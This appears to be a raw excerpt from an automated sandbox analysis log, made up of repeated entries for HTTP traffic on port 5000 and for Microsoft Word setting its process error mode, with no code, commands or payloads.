Source: unknownNetwork traffic detected: HTTP traffic on port 49288 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49288
Source: unknownNetwork traffic detected: HTTP traffic on port 49289 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49289
Source: unknownNetwork traffic detected: HTTP traffic on port 49290 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49290
Source: unknownNetwork traffic detected: HTTP traffic on port 49291 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49291
Source: unknownNetwork traffic detected: HTTP traffic on port 49292 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49292
Source: unknownNetwork traffic detected: HTTP traffic on port 49293 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49293
Source: unknownNetwork traffic detected: HTTP traffic on port 49294 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49294
Source: unknownNetwork traffic detected: HTTP traffic on port 49295 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49295
Source: unknownNetwork traffic detected: HTTP traffic on port 49296 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49296
Source: unknownNetwork traffic detected: HTTP traffic on port 49297 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49297
Source: unknownNetwork traffic detected: HTTP traffic on port 49298 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49298
Source: unknownNetwork traffic detected: HTTP traffic on port 49299 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49299
Source: unknownNetwork traffic detected: HTTP traffic on port 49300 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49300
Source: unknownNetwork traffic detected: HTTP traffic on port 49301 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49301
Source: unknownNetwork traffic detected: HTTP traffic on port 49302 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49302
Source: unknownNetwork traffic detected: HTTP traffic on port 49303 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49303
Source: unknownNetwork traffic detected: HTTP traffic on port 49304 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49304
Source: unknownNetwork traffic detected: HTTP traffic on port 49305 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49305
Source: unknownNetwork traffic detected: HTTP traffic on port 49306 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49306
Source: unknownNetwork traffic detected: HTTP traffic on port 49307 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49307
Source: unknownNetwork traffic detected: HTTP traffic on port 49308 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49308
Source: unknownNetwork traffic detected: HTTP traffic on port 49309 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49309
Source: unknownNetwork traffic detected: HTTP traffic on port 49310 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49310
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49310
Source: unknownNetwork traffic detected: HTTP traffic on port 49311 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49311
Source: unknownNetwork traffic detected: HTTP traffic on port 49312 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49312
Source: unknownNetwork traffic detected: HTTP traffic on port 49313 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49313
Source: unknownNetwork traffic detected: HTTP traffic on port 49314 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49314
Source: unknownNetwork traffic detected: HTTP traffic on port 49315 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49315
Source: unknownNetwork traffic detected: HTTP traffic on port 49316 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49316
Source: unknownNetwork traffic detected: HTTP traffic on port 49317 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49317
Source: unknownNetwork traffic detected: HTTP traffic on port 49318 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49318
Source: unknownNetwork traffic detected: HTTP traffic on port 49319 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49319
Source: unknownNetwork traffic detected: HTTP traffic on port 49320 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49320
Source: unknownNetwork traffic detected: HTTP traffic on port 49321 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49321
Source: unknownNetwork traffic detected: HTTP traffic on port 49322 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49322
Source: unknownNetwork traffic detected: HTTP traffic on port 49323 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49323
Source: unknownNetwork traffic detected: HTTP traffic on port 49324 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49324
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49814
Source: unknownNetwork traffic detected: HTTP traffic on port 49327 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49327
Source: unknownNetwork traffic detected: HTTP traffic on port 49328 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49328
Source: unknownNetwork traffic detected: HTTP traffic on port 49329 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49329
Source: unknownNetwork traffic detected: HTTP traffic on port 49330 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49330
Source: unknownNetwork traffic detected: HTTP traffic on port 49331 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49331
Source: unknownNetwork traffic detected: HTTP traffic on port 49332 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49332
Source: unknownNetwork traffic detected: HTTP traffic on port 49333 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49333
Source: unknownNetwork traffic detected: HTTP traffic on port 49334 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49334
Source: unknownNetwork traffic detected: HTTP traffic on port 49335 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49335
Source: unknownNetwork traffic detected: HTTP traffic on port 49336 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49336
Source: unknownNetwork traffic detected: HTTP traffic on port 49337 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49337
Source: unknownNetwork traffic detected: HTTP traffic on port 49338 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49338
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
